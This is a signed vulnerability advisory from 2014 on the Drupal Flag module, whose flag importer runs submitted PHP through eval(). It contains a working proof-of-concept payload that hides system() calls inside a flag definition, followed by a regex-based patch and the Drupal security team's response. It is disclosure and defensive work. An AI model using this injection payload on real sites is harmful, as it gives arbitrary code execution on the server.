-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Drupal Flag 7.x-3.5 Module Vulnerability Report

Author: Ubani Anthony Balogun <ubani@sas.upenn.edu>
Reported: May 07, 2014

Module Description:
- -------------------
Flag is a flexible flagging system that is completely customizable by
the administrator.
Using this module, the site administrator can provide any number of
flags for nodes, comments,
users, and any other type of entity. Some possibilities include
bookmarks, marking important,
friends, or flag as offensive. With extensive views integration, you
can create custom lists of
popular content or keep tabs on important content.

Description of Vulnerability:
- -----------------------------
The Flag 7.x-3.5 module contains an improper input handling (IH)
vulnerability created by it's failure to validate user
supplied PHP code, input via it's "flag importer" form, before using
PHP's "eval" function to execute the code on the server.
Using the flag importer form, a malicious user is able to execute
arbitrary code with the permissions of the server on the host machine.

Systems Impacted:
- ----------------
Drupal 7.26 with Flag 7.x-3.0 and Flag 7.x-3.5 (current recommended
release) were tested and found to be vulnerable

Impact:
- -------
Users with the permission to use the flag importer can inject and
execute arbitrary code on the host server with server permissions.
This vulnerability can be exploited to upload a malicious payload onto
the vulnerable server, mount a Denial of Service (DoS) attack
or effect other server-side attacks.


Mitigating Factors:
- -------------------
This vulnerability is mitigated by the fact that a user must have
permission to use the flag importer. The Flag module
deactivates this permission by default for users other than site
administrators, and cautions adminsitrators against granting
this permission to other roles.

Proof of Concept:
- -----------------
1. Install and enable the Flag module
2. Using an account with permissions to use the flag importer,
navigate to the flag import page (?q=admin/structure/flags/import)
   and submit the below code via the "Flag import code" text area:

//Valid flag definition. This is required to successfully submit the
flag import form
$flags = array();
// Exported flag: "Bookmarks".
$flags['bookmarks'] = array (
  'entity_type' => 'node',
  'title' => 'Bookmarks',
  'global' => '0',
  'types' =>
  array (
    0 => 'article',
    1 => 'page',
    2 => 'people',
  ),
  'flag_short' => 'Bookmark this',
  'flag_long' => 'Add this post to your bookmarks',
  'flag_message' => 'This post has been added to your bookmarks',
  'unflag_short' => 'Unbookmark this',
  'unflag_long' => 'Remove this post from your bookmarks',
  'unflag_message' => 'This post has been removed from your bookmarks',
  'unflag_denied_text' => '',
  'link_type' => 'toggle',
  'weight' => 0,
  'show_in_links' =>
  array (
    'full' => 'full',
    'teaser' => 'teaser',
    'rss' => 'rss',
    'search_index' => 'search_index',
    'search_result' => 'search_result',
  ),
  'show_as_field' => 1,
  'show_on_form' => 1,
  'access_author' => '',
  'show_contextual_link' => 1,
  'i18n' => 0,
  'api_version' => 3,
);
// Malicious user input. Any amount of arbitrary code can be run after
here and before the "return flags" statement
system("whoami > /tmp/whoami.txt;");
system("echo \"<?php echo 'I p0wn Server now'; ?>\" >>
/tmp/do_evil.php;");
return $flags;

3. On the server machine, navigate to the /tmp directory to find the
created files "whoami.txt" and "do_evil.php".
   "whoami.txt" contains the user who executed the code above
(server). "do_evil.php" contains the PHP code submitted
    via the flag importer form above.
Note: This proof of concept assumes a linux server is being used. This
does not imply that non-linux systems are not
       vulnerable.

Patch:
- ------
The following patch mitigates the vulnerability

- --- flag-7.x-3.5_vuln/flag/includes/flag.export.inc  2014-05-03
06:39:27.000000000 -0400
+++
/var/www/html/drupal-7.26/sites/all/modules/flag/includes/flag.export.inc
2014-05-07 12:28:19.780973535 -0400
@@ -99,8 +99,17 @@ function flag_import_form() {
  */
 function flag_import_form_validate($form, &$form_state) {
   $flags = array();
+
+  $code = $form_state['values']['import'];
+  $regex =
'#\b(?:(?!array)(?!flags\[))(\$)*([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\s*(\[.*|\(.*))#';
# Regular expression to catch function calls except array(), and
prevent all arrays that aren't of the form "flags[]" from being
created and used
+
+  if (preg_match($regex,$code,$match)){
+    form_set_error('import',t('The flag import failed because the
following function call was detected in the code: %func',
array('%func' => $match[0])));
+    return;
+  }
+
   ob_start();
- -  eval($form_state['values']['import']);
+  eval($code);
   ob_end_clean();

   if (!isset($flags) || !is_array($flags)) {


Vendor Response:
- ---------------------
The Drupal Security team was contacted on May 8, 2014 and responded
that because the permissions assignment page
carries the warning "Warning: Give to trusted roles only; this
permission has security implications." a coordinated
security fix and announcement is not warranted.

- -- 
Ubani Anthony Balogun
Information Security and Unix Services
University of Pennsylvania
School of Arts and Sciences
3600 Market St.
Suite 501
Philadelphia, PA 19104
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTbPv1AAoJEKwVbF01qrx/j74IALNB7cp+fbaFMWTTQcTWSunk
1lByAHMtowF+xaZTa0HV477jpTNH/TxgWp0Unck6RNiA9VL1EQ1tVwD7Zl9pH0x7
e0UlKkbFQLWDrgxy3McVX0Zd99StH64727psMECMQuaIHRLUvMT4qQLPhjKcd+8t
ikBSugPpPN8M+qmldiETurt7lA0khEPLGvep7k1x1FAtdqZB0D2s3CSmg5HT2TXu
toE4Roo6dKXxgASXrgHw3jUVQQy9AUlIrG+K/KjjWKQOaJbXH7foUzKt9pmCYunO
gjSZFHDru+7k2ScSGGWh+VP2Zs+seq5cIPydS8QawQX0T5fHfUine/sd+iyNvLc=
=jfw7
-----END PGP SIGNATURE-----